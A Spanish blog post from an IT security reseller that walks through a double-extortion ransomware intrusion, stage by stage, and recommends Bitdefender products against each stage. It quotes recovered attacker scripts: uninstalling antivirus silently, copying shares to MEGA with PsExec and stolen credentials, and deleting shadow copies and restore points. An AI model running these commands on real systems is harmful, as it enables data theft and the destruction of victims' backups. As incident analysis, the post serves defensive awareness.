Home » Publicación de Datos Post Ransomware

Publicación de Datos Post Ransomware

En marcha una nueva extorsión

Una segunda vía de extorsión ya está en marcha y todos los clientes que han sufrido alguna vez un ataque de secuestro de datos podrían estar expuestos, si éstos no ha denunciado la brecha de seguridad ante la GDPR.

Durante las últimas intervenciones de Reditelsa en clientes que deseaban incorporar a su seguridad la solución de Bitdefender (post-ataque) debido a que la solución anterior había sido ineficiente, detectamos en los registros de consumo de ancho de banda un alto incremento durante el fin de semana. Normalmente, este tipo de ataque se realiza los viernes, aprovechando que durante el fin de semana no existen controles humanos o bien los síntomas del cifrado de datos no se detectan. Este tiempo permite al atacante  transferir los datos críticos de nivel alto a un lugar externo.

La eficacia de la funcionalidad de EDR ( EndPoint Detection and Response ) ha permitido además detectar y frenar el ataque, permitiendo a Reditelsa obtener las herramientas del atacante (Toolkit) que usan para tal fin. La sorpresa fue mayúscula al descubrir, no sólo la elegancia y optimización del código en los scripts, sino también la conexión con nubes de alojamiento externo para depositar los datos del cliente.

¿Que uso harán de los datos robados?  

La primera impresión sería que la intención fuese la obtención de claves, datos financieros, direcciones de correo o cualquier otro dato, para su uso en futuros ataques a terceros.

LA VERDAD PODRÍA SER OTRA.

Valorando el volumen de datos y la selección de los datos transferidos, bien podría tratarse de una exposición de datos en formato wikipedia en cualquier servidor en alguna república digital, incluyendo fechas y detalles del ataque; de tal forma que si la empresa atacada no ha denunciado y notificado a la Agencia Española de Protección de Datos AEPD su brecha de seguridad, por miedo a la sanción; ésta sea extorsionada con una nueva cantidad de Bitcoins recurrente.

«Creemos que esto está pasando desde principios del 2019. Además del secuestro de la información, los datos están siendo acumulados en algún lugar para más tarde extorsionar a las empresas con hacer pública la información. «

Redes y Equipos de Telecomunicación S.A ( Reditelsa )

Modus Operandi

Como anunciamos años atrás, el ataque se establece por combinación de varios vectores (Malware, Keyloggers, Ingeniería Social, Spam, phishing… ). Esto es una realidad conocida: hoy existe además una planificación previa junto a un análisis de daños por parte del atacante y la selección de los datos a robar. Esta ventana de planificación y ejecución puede durar semanas.

Os mostramos una gráfica de tiempo para entender el proceso.

Semanas Previas al ataque

ANÁLISIS DE PUERTOS

Se inicia con la detección de puertos abiertos hacia servicios internos. No importa si están «mapeados» porque identifican el servicio según el «Hello» de bienvenida o la respuesta de una batería de comandos de inicio de conexión a diferentes servicios.


Solución: Cierre de puertos y acceso a los servicios internos por VPN. Véase la VPN inversa como la mejor opción. Un ejemplo es  Softether.net


Software de Análisis: Dentro del amplio espectro de software que se puede usar para realizar dicho análisis, encontramos ZenMap basado en NMap.

Semanas Previas al ataque

A traves del software Ilegal

UTILIZACIÓN DE CRACKS Y KEYGEN

Otra forma eficaz de acceso a los servicios internos sin necesidad de análisis de puertos externos es la utilización de los conocidos como Cracks y KeyGen.  Esta mala praxis está muy extendida debido a que se ignora su verdadera intención; aparentemente no tienen un efecto negativo en el cliente pero es todo lo contrario. Pasados unos días ó incluso semanas, este tipo de software suele generar la apertura de un puerto o directamente un túnel de conexión al atacante. Esto permite la localización de los servidores y servicios internos de forma remota.


Solución:

  • Bitdefender Patch Managment:  Actualización del sistema y cualquier otro software en servidores y workstation de la empresa de forma automática.
  • Bitdefender SandBoxing: Detonación automática de las descargas de los usuarios previa a su utilización dentro de la empresa.
A traves del software Ilegal

Semanas Previas al ataque

ANÁLISIS DE VULNERABILIDADES

A través de operaciones de Croaking (Obtención del inventario de software y sistema operativos, así como sus versiones y faltas de actualización) hacen uso de la información recolectada para aplicar con posteridad los exploits de las vulnerabilidades contrastadas con exploit-db.com(ejemplo) obteniendo acceso a los servidores y servicios con privilegios elevados.


Solucion: 

Semanas Previas al ataque

Vulnerabilidades, Semana Antes del ataque

INSPECCIÓN DE TRAFICO Y LOCALIZACIÓN DE DATOS

Con acceso a uno o varios EndPoint de la empresa, instalan un inspector de trafico y localizan los repositorios de la empresa. 


Solución:

Bitdefender Advanced Threat Security se trata de una solución que determina la amenaza según su comportamiento y no por firmas o cadenas víricas.

EndPoint Detection y Response (EDR) Funcionalidad que realizar una representación gráfica de los ataques y la cual puedes lanzar preguntas a la red en el propósito de localizar procesos y accesos anómalos en los dispositivos de la red.

Vulnerabilidades, Semana Antes del ataque

Des-activación, Momentos antes al ataque

LOCALIZACION Y DESACTIVACION DE ELEMENTOS DE SEGURIDAD

Unos de los aspectos mas frustrantes e inevitables con cualquier solución se seguridad es que puede ser des-activada, des-instalada o eliminada porque el atacante se comporta como el Administrador de la Red. El atacante prepara un script de ejecucion en cada una de las maquinas-victimas para la des-instalación de las soluciones de seguridad añadidas y nativas en los sistemas operativos.


Solución:

Todos los agentes de Bitdefender instalados tienen la posibilidad de ser des-instalados si la política de seguridad no incluye el password de des-instalacion. Les recomendamos encarecidamente que se incluya de inmediato en la políticas de Bitdefender que se están usando. La password de des-instalacion puede ser modificada en-linea si necesidad de modificar o re-instalar agentes.

¿Como establecer una contraseña de des-instalacion?


Extracto de Script de la des-activacion de los servicios de seguridad:

$Exp = «cmd.exe /c ‘C:\Program Files\Malwarebytes\Anti-Malware\unins001.exe’ /silent /noreboot»;
Invoke-Expression $Exp;
& ‘C:\Program Files\Malwarebytes\Anti-Malware\unins000.exe’ /silent /noreboot
& «C:\Program Files\Microsoft Security Client\Setup.exe» /x /s

Des-activación, Momentos antes al ataque

Hora del ataque planificada

VIERNES 23:00PM

Durante el análisis obtenido de la empresa semanas antes, se determina si la empresa tiene actividad durante el fin de semana o si por el contrario existe movimientos de trafico en la madrugada del Sábado y Domingo. El objeto de este apartado es tener el máximo tiempo posible para realizar el ataque antes de ser detectados.

En relación a este articulo/post, ademas del tiempo de cifrado, el atacante necesita tiempo para mover grandes cantidades de información al exterior, para realizar el segundo ataque de extorsión pasado unos meses después.


Solución:

Establecer en la Política de Bitdefender la prohibición de navegación por paginas de alojamiento externo de información en paraísos digitales o de poca garantía legal tipo Megaupload, Upload, etc..  O bien, prohibir la navegación global en servidores limitando la navegación a las paginas mínimas imprescindibles en servidores, prohibiendo ademas protocolos de transferencia de ficheros, véase como ejemplo FTP y/o WEBDAV.

Véase políticas de filtrado de navegación

Hora del ataque planificada

Copia de la informacion durante el ataque

ROBO DE LA INFORMACIÓN

Habiendo obtenido en pasos anteriores el volumen total de datos críticos se establecen dos tiempos, tiempo MAX_COPY y MAX_ENCRYPT, se procederá a la copia de la información mas relevante a un repositorio externo. Vamos a tomar como ejemplo MEGAUPLOAD, pero queremos advertir que hay multitud de repositorios que pueden ser usado para tal fin.

Estos ejemplos son extractos obtenidos por equipo de Reditelsa en la base instaladas de sus clientes. Los nombres de usuario y  host han sido modificados para la proteger la identidad del cliente final.

Creación de un proceso Batch (Para la copia de la información a un repositorio externo)

endcustomerSERV = Nombre del Host que contiene la informacion.

dominio/user = Dominio y usuario del cual se han obtenido sus credenciales.

P@ssW0rd = Password de la maquina obtenida.

Dentro del fichero Bat, se escribe el listado de tareas lanzadas. Esta linea se repite N Veces por cada HOST. No hay LOOP (for next) sino que es secuencial, donde se establece un tiempo máximo de copiado para acabar antes del lunes 8:00am.

La utilizacion de PsExec.exe permite lanzar la tarea a cada una de las maquinas como tarea propia de cada una. Esto acelara el proceso y minimiza el riesgo/punto de fallo. 

Comprobacion del servicio de MegaUpload:

megadl ‘https://mega.nz/#G!IK9KDDLpRS8J1h82KpDDa0kWJ43AD43kPwD’

Ejecucion de la copia.

start PsExec.exe -d \\endcustomerSERV -u «dominio\user» -p «P@ssW0rd» -s cmd /c megacopy «\\endcustomerserv.endcustomer.endcustomer.com\share$\*.*» 
timeout /t $MAX_COPY

Copia de la informacion durante el ataque

Borrado durante el ataque

BORRADO DE LAS COPIAS DE SEGURIDAD

Si existen Backup en la empresa, la extorsión no seria posible ya que sin realizar el pago, la victima optaría por restaurar la información. Es por ello por lo que los atacantes borran los puntos de restauración y backups.

Este fragmento del código pertenece a un script powershell (PS1) que hemos extraído durante un ataque como ejemplo,

Set-MpPreference -DisableRealtimeMonitoring $true;
Get-ComputerRestorePoint | Delete-ComputerRestorePoint;
dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
vssadmin delete shadows /all /quiet
wbadmin stop job
cmd.exe /c assoc .README=txtfile

Solución:

Utilice la funcionalidad Bitdefender Risk Manager, modulo añadido con el paquete básico para verificar que los equipos no puedan lanzar procesos POWERSHELL por defecto.

Este modulo permite corregir las vulnerabilidades por una errónea configuración de los equipos y la red..

Borrado durante el ataque

Cifrado de los Datos, continua el ataque

CIFRADO DE DATOS

Este paso se ajusta a otros ya anunciados. Pero al contrario que en el convencional ataque de ransomware por correo electrónico, esta se esta realizado a medida del cliente a través del control remoto de sus equipos. Por tanto cada una de las victimas (empresas) tiene un mecanismo diferente.  

Cifrado de los Datos, continua el ataque

Notificación, posterior al Cifrado

NOTIFICACION Y ENGAÑO A LA VICTIMA

Para confundir mas al usuario, y con el propósito de que no se detecte el vector de ataque usado, los hackers suelen dejar mensajes contradictorio o falsos en cuanto al ransomware usado. Esto se realiza para que la victima busque una solución al problema teniendo un diagnostico equivocado. 

Notificación, posterior al Cifrado

Resumen:

  • El correo electrónico sigue siendo un vector de ataque importante pero el Escritorio Remoto RDP a través de puertos con NAT se ha convertido un vector muy efectivo a grupos mas grandes de equipos en una red.
  • El ataque no consiste solo cifrar los datos, AHORA también se ROBAN para mas tarde exponerlos en Internet y extorsionar de nuevo a la victima.
  • La mala Praxis y la mala configuración de los equipos permiten una mayor penetración con privilegios elevados. Hagan uso de Bitdefender Risk Manager incluido en el paquete básico para impedirlo.
  • Gran parte de este ataque se habría evitado si el cliente hubiera contratado PM (Bitdefender Patch Manager).
  • El control de lo que ocurre en su red y las acciones por terceros dentro de su red, lo puede visualizar usando EDR (Bitdefender Endpoint Detection and Response) 

No podemos ofrecer públicamente el contenido total de las herramientas y ficheros que hemos encontrado durante los Enero 2020. Pero podemos ofreceros acceso a ellos, mostraros su eficacia y sobretodo su elegancia en la elaboración del código en una sesión de formación.


Atentamente,

Sergio Vuelta (Área de Servicios Cloud/IT de Reditelsa)

Agradecemos que nos dejes un comentario si te ha parecido interesante esta información.